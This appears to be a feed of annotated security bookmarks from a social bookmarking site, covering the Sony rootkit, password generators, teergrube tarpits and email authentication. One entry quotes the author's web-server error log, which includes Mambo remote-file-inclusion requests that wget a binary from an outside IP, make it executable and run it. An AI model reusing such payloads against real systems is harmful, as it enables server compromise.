Firefox extension incorporating Nick Wolff's Password Generator bookmarklet

What everybody knew already: Diebold voting machines are easily hacked

Mark Russinovich exposes the pesky XCP rootkit DRM used by Sony What I find the most amusing is that the vendor who created this rootkit malware apparently included the GNU Lame mp3 library in violation of its LGPL license.

More on HTTP teergrubing, including a nasty Location: loop I experimentally set up a CGI which feeds stuff from /dev/random at a glacial pace, and ScriptAlias a number of frequently requested security holes to that. Lessee what I have in the trap tomorrow ... obPeeve: The guy could learn how to spell "teergrubing". (The German word "grube" has a long "oo" sound in the middle and a short "uh" sound at the end.) See also http://de.lirio.us/rubric/entry/51442

On the web pages of some large US banks, what happens when you change the URL from "http" to "https" or vice versa Summary: they suck

Sheesh, people just DO NOT GET password security '"Our policy is that employees safeguard their passwords and access codes so we can ensure privacy and confidentiality for our patients. A violation of that policy can result in termination." Nelson said she knew the policy but says that workers sharing log-ins isn't uncommon.' The woman still wants to appeal her termination.

"this wasn't a matter of hacking into her phone at all, [instead, they used] a well-known security flaw on T-Mobile's Web site, with which the phone is synchronized" (Sic, the link is to a ".htm" file. The "print friendly" link seems to be broken, otherwise I'd have linked to that as usual.)

"After all, if the conventional wisdom was working, the rate of systems being compromised would be going down, wouldn't it?"

Black-hat tutorial of Scapy, a Python network library

Known vulnerabilities in Mozilla, Firefox, and Thunderbird

"Depending on how security-conscious you are, [Symantec] are either making their [email] messages look suspicious or training users to ignore warning signs."

Spam and security related blog The layout and the puns are atrocious, but maybe it could be re-skinned and filtered somehow.

Use case methodologies for threat modelling I thought I was clever but this guy was first. The same author has written other articles about this concept; see CiteSeer and/or Google for more.

Steal bandwidth from phishers by loading this page Not sure I like the meme, but there it is. By keeping this page open in your browser, you continually add load to (alleged) phishing sites.

Here are mine, too, top 78 from the last few weeks They get extremely boring after this point so I'm cutting off at five or more in the twenty weeks I have error logs from. Maybe you could redirect requests for these to some interesting place. Wink wink. 254 File does not exist: /var/www/xmlrpc.php 149 script not found or unable to stat: /usr/lib/cgi-bin/awstats 146 script not found or unable to stat: /usr/lib/cgi-bin/awstats.pl 142 File does not exist: /var/www/awstats/awstats.pl 132 File does not exist: /var/www/wordpress/xmlrpc.php 132 File does not exist: /var/www/phpgroupware/xmlrpc.php 132 File does not exist: /var/www/drupal/xmlrpc.php 119 File does not exist: /var/www/blog/xmlrpc.php 118 File does not exist: /var/www/blogs/xmlsrv/xmlrpc.php 116 File does not exist: /var/www/blog/xmlsrv/xmlrpc.php 115 File does not exist: /var/www/xmlsrv/xmlrpc.php 115 File does not exist: /var/www/xmlrpc/xmlrpc.php 102 File does not exist: /var/www/MSOffice/cltreq.asp 33 File does not exist: /var/www/mambo/index2.php 33 File does not exist: /var/www/index.php 33 File does not exist: /var/www/index2.php 28 client denied by server configuration: /usr/share/doc/apache-doc 26 File does not exist: /var/www/cvs/index2.php 25 File does not exist: /var/www/modules/Forums/admin/admin_styles.phpadmin_styles.php 24 File does not exist: /var/www/ers/svenska/skriv_fel.html 18 script not found or unable to stat: /usr/lib/cgi-bin/stats 18 File does not exist: /var/www/modules/Forums/admin/admin_styles.php 18 File does not exist: /var/www/modules/coppermine/themes/default/theme.php 17 File does not exist: /var/www/admin_styles.phpadmin_styles.php 16 File does not exist: /var/www/modules/coppermine/themes/default/theme.phptheme.php 16 File does not exist: /var/www/Forums/admin/admin_styles.php 15 File does not exist: /var/www/phpmyadmin/main.php 14 File does not exist: /var/www/web/phpMyAdmin/main.php 14 File does not exist: /var/www/stats/awstats.pl 14 File does not exist: /var/www/PMA/main.php 14 File does not exist: /var/www/phpmyadmin2/main.php 14 File does not exist: /var/www/phpMyAdmin-2.6.3-rc1/main.php 14 File does not exist: /var/www/phpMyAdmin-2.6.3-pl1/main.php 14 File does not exist: /var/www/phpMyAdmin-2.6.3/main.php 14 File does not exist: /var/www/phpMyAdmin-2.6.2-rc1/main.php 14 File does not exist: /var/www/phpMyAdmin-2.6.0-pl1/main.php 14 File does not exist: /var/www/phpMyAdmin-2.6.0/main.php 14 File does not exist: /var/www/phpMyAdmin-2.5.6/main.php 14 File does not exist: /var/www/phpMyAdmin-2.5.4/main.php 14 File does not exist: /var/www/phpMyAdmin-2.5.1/main.php 14 File does not exist: /var/www/phpMyAdmin-2.2.6/main.php 14 File does not exist: /var/www/phpMyAdmin-2.2.3/main.php 14 File does not exist: /var/www/mysql/main.php 14 File does not exist: /var/www/mysqladmin/main.php 14 File does not exist: /var/www/mysql-admin/main.php 14 File does not exist: /var/www/myadmin/main.php 14 File does not exist: /var/www/main.php 14 File does not exist: /var/www/db/main.php 14 File does not exist: /var/www/dbadmin/main.php 14 File does not exist: /var/www//awstats.pl 14 File does not exist: /var/www/admin/pma/main.php 14 File does not exist: /var/www/admin/phpmyadmin/main.php 14 File does not exist: /var/www/admin/mysql/main.php 14 File does not exist: /var/www/admin/main.php 13 request failed: erroneous characters after protocol string: GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\x01.1 13 request failed: erroneous characters after protocol string: GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\x01.1 13 File does not exist: /var/www/cvs/mambo/index2.php 12 request failed: erroneous characters after protocol string: GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\x01.1 12 request failed: erroneous characters after protocol string: GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\x01.1 12 request failed: erroneous characters after protocol string: GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\x01.1 12 request failed: erroneous characters after protocol string: GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\x01.1 12 File does not exist: /var/www//cgi/stats/awstats.pl 12 File does not exist: /var/www/cgi/awstats.pl 12 File does not exist: /var/www//awstats/awstats.pl 11 File does not exist: /var/www//stats/awstats.pl 11 File does not exist: /var/www//cgi/awstats.pl 9 File does not exist: /var/www/cacti/graph_image.php 8 File does not exist: /var/www/_vti_bin/owssvr.dll 8 File does not exist: /var/www/stats/awstats/awstats.pl 8 File does not exist: /var/www/cgibin/awstats.pl 8 File does not exist: /var/www/cgibin/awstats/awstats.pl 7 File does not exist: /var/www/phpmyadmin/index.php 6 File does not exist: /var/www/stats/cgi-bin/awstats.pl 6 File does not exist: /var/www/siteinfo.xml 6 File does not exist: /var/www/Forums/admin/admin_styles.phpadmin_styles.php 6 File does not exist: /var/www/awstats.pl/awstats.pl 5 File does not exist: /var/www/robotsxx.txt 5 File does not exist: /var/www/articles/mambo/index2.php

Dr. John on MARID, DKIM, etc "Bad authentication is worse than no authentication because a bad system will sometimes pass bad mail and fail good mail, meaning either that mail gets even less reliable than it is now, or more likely that mail systems only pretend to use it and outsiders end up scratching their heads wondering why it didn't help. (Most of the people who claim to use SPF or Sender-ID are just pretending, the few foolish or deseperate ones that really do reject lots of legit mail.)"

Scans submitted files with more than a dozen different virus scanners

The threat is real. Here's what to do. While the Fermilab researcher is almost certainly clueless (if not a complete kook), the issue is real, on another level. What's unnerving to think about is what we are transmitting to aliens right now, and what we should do about it. Imagine an intergalactic nuke which eradicates New York after transmitting a message: "This is your only warning. Stop broadcasting those shampoo infomercials NOW. You have fifty years to comply." More seriously, think about what vulnerabilities of ours we are exposing to whoever may be listening. While they will probably lack the context to discern fictional programming from reality, I can suggest some measures to reduce the risk that they use this information against us. 1) Ban commercials from over the air transmissions. If you want commercials, get cable. While we are at it, outlaw Shopping Channel, which is probably the single most revealing exponent of our weaknesses. 2) Scramble sensitive signals. I'm sure the DRM lobby can get the US Congress to pass a law that requires all citizens to get a decoder. The silly Japanese will voluntarily pass a similar law. The civilized world will benefit from not being able to watch American television any longer. 3) Somehow encode in the signal from CNN that "we don't take this too seriously, so you shouldn't, either" 4) Remodulate all signals to be indistinguishable from the cosmic background noise. This will coincidentally reduce the possibility that our transmissions accidentally interfere with a critical remote infrastructure. Ideally, it will also make television impossible.

Look for posts by brenno re: the Sony DRM rootkit

Re: the Netcraft toolbar, tangentially. "Every piece of software on his computer was updated, his system was totally clean, and get this, he was learning how to use the software himself and becoming a knowledgable computer user because he could be safely productive on his machine."

Port scanning trend monitor

Interim report from running a simple teergrube script over the weekend 97 requests from 17 different IP addresses during the last few days. Somebody seems to have gotten hold of a bunch of near-adjacent IP addresses so it's actually probably only 15 difrerent sources. I changed the script to pull stuff from /dev/urandom since it was just too slow otherwise, and anyway, the entropy of the random data is not exactly a concern here. Over the weekend, one particular loser pulled down 20 meg in two requests over two days. I bet I have a new fan there. (At 83.17.53.162 in case you care.) Most script kiddies (or worms?) are clever enough to pull down just the first 512 or 768 or 2304 or 8448 bytes (no prizes for guessing the significance of those numbers?) so I guess I should have a plan B for them.

Being able to link to "http://de.lirio.us/[/a-zA-Z0-9]+" would be nice Being able to refer to other pages at this site from the body and/or the description should not open up any significant security holes, cross-site scripting or otherwise (famous last words [tm]) and would enhance the usability of the site a great deal.

Closing an account altogether seems a bit harsh If I thought I had found a security problem, I might well just try it out on the site, typically under the assumption that I was probably wrong about it anyway, and that any conscentious coder would have covered the case already in his design. Having one post removed, and perhaps having my password changed, with an explanation sent to the email address I used when I signed up, would be a quite acceptable consequence for such carelessness. Anything beyond that would seem overtly harsh, IMHO. Editing the malicious part out of a posting would be preferrable, even. But I can understand how security concerns might override such matters of politeness and fair play. Still, it would be nice to hear "innocent until proven guilty" from the management.

Yet another password hash generator for Firefox (or at least a proposal) See also http://de.lirio.us/rubric/entry/7856

JavaScript-based MD5 password generator; input is the master password plus site URL Pretty nifty -- this means you get a reasonably secure password which you can calculate again if you forget it, but others who do not know how it was calculated will not be able to. Just make sure your master password is not compromised :^) See also http://de.lirio.us/rubric/entry/14380